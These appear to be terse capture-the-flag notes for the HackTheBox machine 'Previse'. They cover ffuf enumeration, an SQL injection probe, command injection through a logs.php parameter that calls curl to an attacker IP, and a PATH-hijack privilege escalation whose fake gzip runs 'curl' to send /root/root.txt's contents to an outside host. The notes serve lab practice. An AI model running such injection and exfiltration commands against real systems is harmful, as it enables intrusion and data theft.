Previse
Enumeration
ffuf -w /media/lrb/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.previse.htb" -u http://previse.htb -fc 301
ffuf -w ../burp-parameter-names.txt -u http://10.10.11.104/config.php?FUZZ=abcd
# Following endpoints are available:
http://10.10.11.104/nav.php
http://10.10.11.104/accounts.php
http://10.10.11.104/files.php
http://10.10.11.104/status.php
http://10.10.11.104/file_logs.php1623978778,m4lwhere,32 http://10.10.11.104/download.php?file=32
cat file_logs | cut -d, -f3 | sort -n | uniq
config.php $user = 'root'; $passwd = '[redacted]';
user12';-- -
SELECT * FROM accounts WHERE username = '{$username}';
grep -ir "$_POST"
-logs.php delim=comma;curl+http%3a//10.10.14.2%3a7906
-mysql password contains salt and icons in text select TO_BASE64(password) from accounts where username="m4lwhere";
2. Priv Esc [ creating gzip executable in custom location ]
export PATH=/home/m4lwhere:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
nano gzip
curl http://10.10.14.5:7908/$(cat /root/root.txt)Path:
ā¢ nav.php contains in-session app. pages ā¢ create user using response modification ā¢ Enumerating files by file ID ā¢ Possible cmd injection - Yup 'logs.php' ā¢ Horizontal PE to m4lwhere - hashed password in mysql DB is the same for system access ā¢ to root via cron ?
Last updated
Was this helpful?